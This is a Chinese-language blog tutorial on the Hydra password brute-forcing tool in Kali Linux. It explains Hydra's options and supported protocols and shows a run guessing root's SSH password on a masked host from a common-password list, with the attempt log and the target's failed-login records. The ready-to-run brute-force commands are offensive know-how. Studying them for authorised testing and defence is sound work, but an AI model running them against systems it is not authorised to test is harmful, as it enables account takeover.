暴力破解工具Hydra 使用

本文介绍了Kali Linux自带的Hydra工具如何用于暴力破解,详细列举了常用命令和参数解释,包括-l、-L、-p、-P等。并展示了针对SSH服务的实战测试,使用top100.txt密码字典对139.x.x.x的目标机器进行攻击。通过`lastb`命令,可以看到暴力破解在目标服务器上的登录尝试记录。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

kali 自带的hydra 工具,直接使用即可,不再赘述安装过程

常用命令如下

  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

其中参数说明

-l        指定要爆破的用户名【常用】
-L              如果用户名很多放在文件中,可以只用这个参数
-p        指定要使用的密码【常用】
-P指定要使用的密码文件
ftp://        指定要爆破的协议,这里使用ftp 协议,其它常用的还有ssh,rdp,mysql、redis等
192.168.0.1指定要爆破的目标机器ip 地址

 

hydra 支持爆破的协议如下

adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

实战测试

目标机器:139.x.x.x

目标服务:ssh

密码字典:top100.txt 【字典下载地址:https://download.youkuaiyun.com/download/helloexp/20107342

hydra -l root -P top100.txt ssh://139.x.x.x -t 4 -V -I

运行过程如下

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-09 16:02:14
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 100 login tries (l:1/p:100), ~25 tries per task
[DATA] attacking ssh://139.x.x.x:22
[ATTEMPT] target 139.x.x.x - login "root" - pass "123456789" - 1 of 100 [child 0] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "a123456" - 2 of 100 [child 1] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "123456" - 3 of 100 [child 2] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "a123456789" - 4 of 100 [child 3] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "1234567890" - 5 of 100 [child 0] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "woaini1314" - 6 of 100 [child 1] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "qq123456" - 7 of 100 [child 2] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "abc123456" - 8 of 100 [child 3] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "123456a" - 9 of 100 [child 0] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "123456789a" - 10 of 100 [child 2] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "147258369" - 11 of 100 [child 1] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "zxcvbnm" - 12 of 100 [child 3] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "987654321" - 13 of 100 [child 0] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "12345678910" - 14 of 100 [child 2] (0/0)

 目标服务器上观察下暴力破解的痕迹

[root@hack139 log]# lastb
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)

可以看到hydra 正在一个个尝试字典中的密码

### 关于 Kali Linux 中 Hydra 工具使用教程 #### 1. 环境准备 为了能够顺利运行 Hydra 工具,首先需要确保已经成功安装并配置好 Kali Linux。可以从官方网站下载适用于不同平台的镜像文件[^3]。 #### 2. 安装 Hydra 通常情况下,在最新版的 Kali Linux 发行版中,默认已预装了 Hydra 工具。如果没有找到此工具,则可以通过包管理器 apt-get 来安装: ```bash sudo apt update && sudo apt install hydra-gtk ``` 这条命令会更新软件源列表并将 Hydra 和图形界面版本一起安装到系统里。 #### 3. 基本语法结构 Hydra 支持多种协议和服务类型的暴力破解操作,基本命令格式如下所示: ```bash hydra [-l LOGIN|-L FILE] [-p PASS|-P FILE] [OPTIONS] target and service ``` 其中 `-l` 或者 `-L` 参数用来指定用户名;而 `-p` 或者 `-P` 则是用来提供密码尝试范围;最后部分为目标地址以及所要攻击的服务名称[^4]。 #### 4. 实际案例演示 假设现在有一个 IP 地址为 `192.168.98.136` 的远程服务器开放了 SSH 登录接口,并且拥有一个名为 `admin` 的账户存在于此机器上。此时可以构建如下的测试指令来对该账号实施简单的字典攻击实验: ```bash hydra -l admin -P /path/to/password_list.txt -f 192.168.98.136 ssh -t 1 -v ``` 这里 `/path/to/password_list.txt` 应替换为你实际存储有候选密码集合文本的位置路径;参数 `-t 1` 表示仅开启单线程执行任务以减少网络流量压力;选项 `-v` 开启详细模式输出更多调试信息帮助理解整个过程进展状况。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿雷由

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值